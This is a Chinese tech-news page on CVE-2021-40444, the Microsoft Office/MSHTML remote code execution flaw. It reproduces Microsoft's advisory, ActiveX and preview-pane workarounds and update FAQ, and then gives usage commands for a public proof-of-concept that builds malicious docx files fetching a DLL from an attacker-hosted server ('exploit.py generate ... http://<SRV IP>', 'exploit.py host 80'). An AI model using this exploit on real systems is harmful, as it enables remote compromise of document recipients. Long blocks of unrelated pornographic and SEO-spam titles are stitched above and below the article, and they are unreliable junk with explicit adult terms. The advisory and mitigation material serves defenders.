精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

微軟Office Word遠程代碼執行漏洞|CVE-2021-40444

安全 漏洞
Microsoft 正在調查 MSHTML 中一個影響 Microsoft Windows 的遠程代碼執行漏洞的報告。

 [[425270]]

漏洞描述

  Microsoft 正在調查 MSHTML 中一個影響 Microsoft Windows 的遠程代碼執行漏洞的報告。Microsoft 發現,存在嘗試通過特別設計的 Microsoft Office 文檔利用此漏洞的針對性攻擊。

  攻擊者可制作一個由托管瀏覽器呈現引擎的 Microsoft Office 文檔使用的惡意 ActiveX 控件。然后,攻擊者必須誘使用戶打開此惡意文件。在系統上配置為具有較少用戶權限的用戶帳戶比具有管理員權限的用戶帳戶所受影響要小。

  Microsoft Defender 防病毒和 Microsoft Defender for Endpoint 均提供檢測和防范已知漏洞的功能。客戶應將反惡意軟件產品保持最新狀態。使用自動更新的客戶不需要采取其他措施。管理更新的企業客戶應當選擇檢測版本 1.349.22.0 或更新版本,以將其部署于整個用戶環境中。Microsoft Defender for Endpoint 警報將顯示為:“Suspicious Cpl File Execution”。

  完成此調查后,Microsoft 將采取有助于保護客戶的適當措施。這可能包括,通過月度發布流程提供安全更新程序,或根據客戶需求不定期提供安全更新程序。

  請參閱緩解措施和解決方法部分,以了解有關保護您的系統免受此漏洞影響之措施的重要信息。

  更新 2021 年 9 月 14 日:Microsoft 已發布安全更新來解決此漏洞。有關適用于您系統的更新,請參閱“安全更新”表。我們建議您立即安裝這些更新。請參閱常見問題解答,以了解適用于您系統的重要信息。

  解決辦法

  在 Internet Explorer 中禁用所有 ActiveX 控件可以緩解這種攻擊。這可以通過使用“本地組策略編輯器”配置組策略或更新注冊表在所有站點中實現。之前安裝的 ActiveX 控件將繼續運行,但是不會受此漏洞的影響。

  如需通過組策略禁用 ActiveX 控件。

  在組策略設置中,導航到計算機配置 > 管理模板 > Windows 組件 > Internet Explorer > Internet 控制面板 > 安全頁面

  對于每個區域:

  1. 選擇區域(Internet 區域、Intranet 區域、本地計算機區域或受信任的站點區域)。
  2. 雙擊下載簽名的 ActiveX 控件并啟用政策。然后將政策中的選項設置為停用。
  3. 雙擊下載未簽名的 ActiveX 控件并啟用政策。然后將政策中的選項設置為停用。

  我們建議將此設置應用至所有區域,以充分保護您的系統。

  變通辦法的影響。

  這可將所有 64 位和 32 位進程的 Internet 區域的 URLACTION_DOWNLOAD_SIGNED_ACTIVEX (0x1001) 和 URLACTION_DOWNLOAD_UNSIGNED_ACTIVEX (0x1004) 設置為禁用 (3)。 新的 ActiveX 控件將不會安裝。之前安裝的 ActiveX 控件將繼續運行。

  如需在單個系統中通過 RegKey 禁用 ActiveX 控件:

  警告如果您不正確地使用注冊表編輯器,則可能會導致嚴重問題(您或許需要重新安裝操作系統)。Microsoft 不保證您可以解決因錯誤使用注冊表編輯器而產生的問題。使用注冊表編輯器的風險由您自己承擔。

  1. 如需在所有區域的 Internet Explorer 中禁用安裝 ActiveX 控件,將以下內容粘貼到文本文件中,并使用 .reg 文件擴展名進行保存:
  1. Windows Registry Editor Version 5.00[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0]"1001"=dword:00000003"1004"=dword:00000003[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1]"1001"=dword:00000003"1004"=dword:00000003[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2]"1001"=dword:00000003"1004"=dword:00000003[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]"1001"=dword:00000003"1004"=dword:00000003 
  1. 雙擊 .reg 文件將其應用到您的策略配置單元中。
  2. 重新啟動系統,以確保應用新配置。

  變通辦法的影響。

  這可將所有 64 位和 32 位進程的 Internet 區域的 URLACTION_DOWNLOAD_SIGNED_ACTIVEX (0x1001) 和 URLACTION_DOWNLOAD_UNSIGNED_ACTIVEX (0x1004) 設置為禁用 (3)。 新的 ActiveX 控件將不會安裝。之前安裝的 ActiveX 控件將繼續運行。

  如何撤消變通辦法

  刪除之前在實施變通辦法過程中添加的注冊表項。

  如需在 Windows Explorer 中禁用預覽

  禁用 Shell Preview 可防止用戶在 Windows Explorer 中預覽文檔。針對您想防止預覽的各類文檔,請執行以下步驟:

  1. 在注冊表編輯器中,導航至合適的注冊表項:

  對于 Word 文檔:

  1. HKEY_CLASSES_ROOT.docx\ShellEx{8895b1c6-b41f-4c1c-a562-0d564250836f}HKEY_CLASSES_ROOT.doc\ShellEx{8895b1c6-b41f-4c1c-a562-0d564250836f}HKEY_CLASSES_ROOT.docm\ShellEx{8895b1c6-b41f-4c1c-a562-0d564250836f} 

  對于多格式文本文件:

  1. HKEY_CLASSES_ROOT.rtf\ShellEx{8895b1c6-b41f-4c1c-a562-0d564250836f} 
  1. 導出 RegKey 的副本以備份。
  2. 雙擊名稱并在編輯字符串對話框中,刪除“數值數據”。
  3. 單擊確定。

  變通辦法的影響

  用戶將無法在 Windows Explorer 中預覽文檔。

  如何撤消變通辦法

  雙擊您在變通辦法步驟二中創建的 .reg 文件。

  常見問題解答

  “安全更新”表中列有適用于 Windows 8.1、Windows Server 2012 R2 和 Windows Server 2012 的三類更新。我需要在我的系統中安裝什么更新來免受此漏洞的影響?

  運行 Windows 8.1、Windows Server 2012 R2 或 Windows Server 2012 的客戶可應用下列選項之一:月度匯總或僅安全更新和 IE 累積更新。

  我運行的是 Windows 7、Windows Server 2008 R2 或 Windows Server 2008。我需要應用月度匯總和 IE 累積更新嗎?

  • Windows 7、Windows Server 2008 R2 和 Windows Server 2008 的月度匯總中包含此漏洞的更新。應用月度匯總的客戶無需再應用 IE 累積更新。
  • 只應用僅安全更新的客戶還需要應用 IE 累積更新,以免受此漏洞的影響。

  CVE-2021-40444 PoC

  項目地址:

  GitHub: github.com/lockedbyte/CVE-2021-40444

  CVE-2021-40444(Microsoft Office Word 遠程代碼執行)惡意 docx 生成器利用工具 .

  此腳本的創建基于對野外使用的示例的一些逆向工程:

938545f7bbe40738908a95da8cdeabb2a11ce2ca36b0f6a74deda9378d380a52(docx 文件)

  你需要先安裝 lcab ( sudo apt-get install lcab)

  1. sudo apt-get install lcab 

  檢查REPRODUCE.md手動復制步驟

  如果您生成的 cab 不起作用,請嘗試將 exploit.html URL 指向 calc.cab

  使用方法

  首先生成一個給定 DLL 的惡意 docx 文檔,您可以使用從調用中test/calc.dll彈出 a 的那個calc.exesystem ()

  1. python3 exploit.py generate test/calc.dll http://<SRV IP> 

  生成惡意 docx(將位于out/)后,您可以設置服務器:

sudo python3 exploit.py host 80

  最后在 Windows 虛擬機中嘗試 docx:打開 word 成功彈出計算器.

  poc 下載地址:

  https://github.com/lockedbyte/CVE-2021-40444

 

責任編輯:張燕妮 來源: freebuf.com
相關推薦

2021-09-10 11:41:20

漏洞Windows 微軟

2017-01-19 20:37:58

office word漏洞下溢

2017-05-25 22:20:05

2019-05-15 15:20:01

微軟漏洞防護

2021-11-08 11:52:17

漏洞LinuxLinux TIPC

2017-05-27 10:22:37

2020-10-23 09:58:57

漏洞

2010-01-15 11:20:06

2020-10-25 09:39:49

漏洞分析

2017-06-15 17:28:36

2017-06-14 10:02:22

2009-05-31 15:34:37

2022-01-12 17:39:23

微軟補丁漏洞

2020-10-19 10:43:49

漏洞

2021-01-26 10:00:45

漏洞網絡安全網絡攻擊

2015-03-06 15:31:01

2021-09-16 14:06:55

遠程代碼漏洞微軟

2020-10-18 08:22:32

安全更新

2025-05-08 09:49:19

2025-09-25 16:48:16

點贊
收藏

51CTO技術棧公眾號

国产日产精品一区| 奇米影视7777精品一区二区| 精品国产网站在线观看| 国产资源在线视频| 成人一区二区不卡免费| 国产精品自拍毛片| 日本久久久久亚洲中字幕| 成人信息集中地| 黄色免费大全亚洲| 欧美美女喷水视频| 男人操女人逼免费视频| 黄色免费在线观看网站| 91女神在线视频| 亚洲v日韩v综合v精品v| 伊人手机在线视频| 午夜国产一区| 中文字幕自拍vr一区二区三区| 精品久久久久一区二区| 福利一区在线| 精品日韩中文字幕| 欧美美女黄色网| jyzzz在线观看视频| 91丨porny丨在线| 97se在线视频| 一级淫片免费看| 石原莉奈在线亚洲三区| 国内精品免费午夜毛片| 成年人一级黄色片| 欧洲福利电影| 国产视频亚洲精品| 国产二级一片内射视频播放| 精品视频在线观看免费观看| 欧美色图12p| 人妻少妇被粗大爽9797pw| 国模私拍视频在线播放| 亚洲人吸女人奶水| 亚洲巨乳在线观看| 国产系列在线观看| 91免费观看视频在线| 国产精品久久精品国产| 国产高中女学生第一次| 精品一区二区在线视频| 国产精品久久久久不卡| youjizz在线视频| 中文国产一区| 91高清视频在线免费观看| 九热这里只有精品| 国产精品扒开腿做爽爽爽软件| 日韩最新免费不卡| www.4hu95.com四虎| 精品视频国产| 在线观看国产精品日韩av| av网在线播放| 欧美日韩亚洲在线观看| 亚洲片在线观看| 亚洲人成人无码网www国产| 亚洲理论电影| 一本一道久久a久久精品逆3p| 在线不卡av电影| 国产精品中文字幕亚洲欧美| 一区二区三区日韩在线| 娇妻被老王脔到高潮失禁视频| 成人区精品一区二区婷婷| 一本一本久久a久久精品牛牛影视| 国产又粗又硬视频| 国产精品成人一区二区不卡| 欧美老少配视频| 日韩欧美一级片| 久久视频一区| 成人激情动漫在线观看| 91传媒视频在线观看| 精品人妻少妇AV无码专区 | 91.com在线| av岛国在线| 色婷婷av久久久久久久| 国内外成人免费在线视频| 日韩黄色av| 99麻豆久久久国产精品免费 | 亚洲制服欧美中文字幕中文字幕| 麻豆tv在线播放| 成人黄色视屏网站| 日韩欧美视频一区| 丰满少妇高潮一区二区| 99久久国产综合精品成人影院| 九色成人免费视频| 丰满少妇xoxoxo视频| 精品在线一区二区| 久久av一区二区| 精品176二区| 亚瑟在线精品视频| 中日韩av在线播放| 国产在线播放精品| 在线观看国产欧美| 日本一区二区三区免费视频| 老司机久久99久久精品播放免费| 亚洲综合最新在线| 黄色av网址在线免费观看| 综合激情成人伊人| 免费日韩中文字幕| baoyu135国产精品免费| 中文亚洲视频在线| 日本韩国欧美中文字幕| 国产又粗又猛又爽又黄91精品| 久久免费看av| 日本高清在线观看| 欧美亚州韩日在线看免费版国语版 | 丰满的护士2在线观看高清| 在线观看视频一区二区欧美日韩| 91免费黄视频| 日本一区二区三区中文字幕 | 亚洲综合国产精品| 2017亚洲天堂1024| 欧美日韩国产影院| 性折磨bdsm欧美激情另类| 成人在线亚洲| 国产91免费观看| 亚洲毛片在线播放| 亚洲私人黄色宅男| 国产精品v日韩精品v在线观看| 亚洲免费福利一区| 国内精品一区二区三区四区| 99国产精品久久久久久久成人| 中文字幕欧美国产| av免费中文字幕| 久久亚州av| 欧美激情伊人电影| www.色视频| 亚洲三级在线免费| 欧美视频国产视频| 99re久久最新地址获取| 国产精品福利在线观看| 久草视频在线看| 色综合久久中文综合久久97| 亚洲天堂美女视频| 欧美特黄一区| 91精品久久久久久蜜桃| 国产91在线视频蝌蚪| 欧美日韩不卡在线| 亚洲aaa视频| 麻豆免费看一区二区三区| 日韩欧美一区二区三区久久婷婷| 日本综合字幕| 中文日韩电影网站| 曰批又黄又爽免费视频| 国产精品日日摸夜夜摸av| 国产九九在线视频| 国产精品成人一区二区不卡| 成人免费视频网| 二区三区四区高清视频在线观看| 在线不卡中文字幕播放| 朝桐光av在线| 国产不卡一区视频| 久久这里只有精品18| 精品精品国产毛片在线看| 久久久久五月天| 女人18毛片水真多18精品| 婷婷国产v国产偷v亚洲高清| 欧美 变态 另类 人妖| 色综合综合色| 国产精品成人av性教育| 91xxx在线观看| 7777精品伊人久久久大香线蕉经典版下载 | 欧美日韩日日骚| 婷婷伊人五月天| 伊人成人在线视频| 精品久久久久久一区二区里番| 欧美私密网站| 在线观看国产精品淫| 国产乱叫456在线| 亚洲精品成a人| 久久人人爽人人爽人人片| 日韩电影在线一区二区三区| 在线一区日本视频| 超碰97久久| 欧美又大又粗又长| 欧美一区二区三区| 精品久久国产字幕高潮| 少妇高潮av久久久久久| 中文字幕一区二区三| 精品1卡二卡三卡四卡老狼| 久久久青草婷婷精品综合日韩| 亚洲国产一区二区精品视频| 日韩欧洲国产| 日本精品在线视频| jizz性欧美| 亚洲精品久久视频| 91一区二区视频| 精品免费在线视频| 三上悠亚在线观看视频| 91网站在线观看视频| 欧美激情国内自拍| 亚洲欧美清纯在线制服| 男人天堂成人网| 亚洲资源网你懂的| 91沈先生播放一区二区| 日韩高清在线| 国a精品视频大全| 蜜芽在线免费观看| 亚洲天堂影视av| 免费av网站在线播放| 欧美巨大另类极品videosbest | 怡红院在线观看| 亚洲视频在线免费看| 99精品视频免费看| 欧美在线视频你懂得| 国产无遮挡又黄又爽| 自拍av一区二区三区| 一级片视频免费看| 成人精品视频一区二区三区| 亚洲第一天堂久久| 蜜桃视频免费观看一区| 波多野结衣家庭教师视频| 国内精品久久久久久久97牛牛| 一级做a爰片久久| 一道在线中文一区二区三区| 国产乱码精品一区二区三区日韩精品| 中文字幕成人| 国产精品视频久久久| 欧美特大特白屁股xxxx| 91禁外国网站| 91福利在线尤物| 欧美激情亚洲一区| 影音先锋中文在线视频| 久久精品视频中文字幕| 在线观看精品一区二区三区| 夜夜嗨av一区二区三区四区| 色网站在线免费观看| 日韩av综合网| 香蕉视频免费看| 亚洲国语精品自产拍在线观看| 亚洲精品国产av| 日韩欧美中文字幕公布| av网站在线免费看| 91精品国产黑色紧身裤美女| 国产又粗又猛又黄又爽| 欧美精品xxxxbbbb| 国产精品玖玖玖| 91精品国产一区二区| 国产欧美综合视频| 欧美一级高清片| 精品人妻一区二区三区三区四区| 欧美一区二区大片| xxxx国产精品| 精品国产伦一区二区三区观看方式 | 永久免费精品视频网站| 99热在线成人| 国内精品国产三级国产99| 欧美另类综合| 青青青国产在线观看| 99精品热6080yy久久| www黄色av| 日本麻豆一区二区三区视频| 污污的网站18| 欧美一区二区| 黄色一级片av| 亚洲第一精品影视| 无码精品国产一区二区三区免费| 视频在线观看一区二区三区| 日韩精品你懂的| 国产在线精品一区在线观看麻豆| 97超碰免费在线观看| 成人免费看视频| 魔女鞋交玉足榨精调教| 欧美激情在线看| 日韩福利小视频| 一区二区三区鲁丝不卡| 国内精品福利视频| 欧美日韩国产精品自在自线| 午夜精品一二三区| 精品呦交小u女在线| 91ph在线| 国产最新精品视频| 免费欧美电影| 5566av亚洲| 免费黄色成人| 中文字幕超清在线免费观看| 激情综合在线| 中文字幕在线导航| 丁香婷婷综合色啪| 少妇av片在线观看| 亚洲午夜av在线| 无码人妻丰满熟妇精品| 91精品黄色片免费大全| 全色精品综合影院| 欧美成人午夜激情在线| 国产精品一二三产区| 国产欧美日韩91| 欧美人与动xxxxz0oz| 天堂v在线视频| 久久国产精品99国产| 性鲍视频在线观看| 国产午夜亚洲精品午夜鲁丝片| 中文字幕影音先锋| 欧美性色综合网| 欧美少妇bbw| 久久精品99久久久香蕉| 黄在线观看免费网站ktv| 成人免费看片视频| 视频一区中文| 精品久久久久久久久久中文字幕| 老司机精品视频在线| 蜜桃传媒一区二区亚洲av| 一区二区三区在线观看网站| а中文在线天堂| 日韩av在线资源| 久久亚洲资源| 91精品视频播放| 欧美中文字幕一区二区| 国产91在线免费| 国产成a人亚洲| 在线观看美女av| 欧美三级韩国三级日本一级| 视频福利在线| 性亚洲最疯狂xxxx高清| 国产精品欧美一区二区三区不卡| 日韩性感在线| 六月丁香综合| 精品人妻无码一区二区三区| 亚洲午夜成aⅴ人片| 99国产精品欲| 久久网福利资源网站| 91精品国产一区二区在线观看| 日韩欧美亚洲精品| 老牛国产精品一区的观看方式| 大黑人交xxx极品hd| 亚洲成人在线免费| 韩国av电影在线观看| 欧美美最猛性xxxxxx| 国产一区二区三区免费在线 | 久久福利小视频| 亚洲一二三级电影| 亚洲av无码片一区二区三区| 久久伊人精品天天| 99tv成人影院| 五月天色婷婷综合| 国产精品一区一区三区| 99成人在线观看| 91精品国产综合久久香蕉麻豆| 免费av在线播放| 亚洲999一在线观看www| 亚洲高清资源在线观看| www.亚洲自拍| 亚洲欧美日韩综合aⅴ视频| av片免费播放| 久久久久久久影院| 欧美日韩一本| www.四虎成人| 国产欧美日产一区| 中文字幕一区二区三区免费看| 深夜福利一区二区| 成人日韩视频| 青青青青草视频| 99国产精品久久久久久久久久久| 国产精品免费精品一区| 亚洲视频在线观看| 欧美成人黄色| 米仓穗香在线观看| 成人h精品动漫一区二区三区| 人人干人人干人人干| 亚洲视频专区在线| 欧美在线se| 欧美久久久久久久久久久久久久| av成人免费在线观看| 久久久精品毛片| 日韩在线精品一区| 6080成人| 日本xxxxxxx免费视频| 国产精品成人在线观看| 性生交大片免费看女人按摩| 98精品国产高清在线xxxx天堂| 精品视频亚洲| 麻豆传媒在线看| 都市激情亚洲色图| 97视频在线观看网站| 99国产在线视频| 噜噜噜躁狠狠躁狠狠精品视频| 成人18视频免费69| 亚洲国产成人久久综合| 韩国成人在线| 国产日韩亚洲欧美在线| 国产偷国产偷精品高清尤物 | 国产风韵犹存在线视精品| 成人免费看片98欧美| 色妞久久福利网| 久久悠悠精品综合网| 五月天av在线播放| 午夜成人在线视频| 亚乱亚乱亚洲乱妇| 国语精品免费视频| 国产一区二区三区四区在线观看| 青青青国产在线| 欧美成人亚洲成人日韩成人| 要久久电视剧全集免费 | 久久久99精品久久| 国产v在线观看| 国产成人鲁鲁免费视频a| 欧美69wwwcom| 欧美午夜激情影院| 亚洲激情中文字幕| 玖玖玖电影综合影院|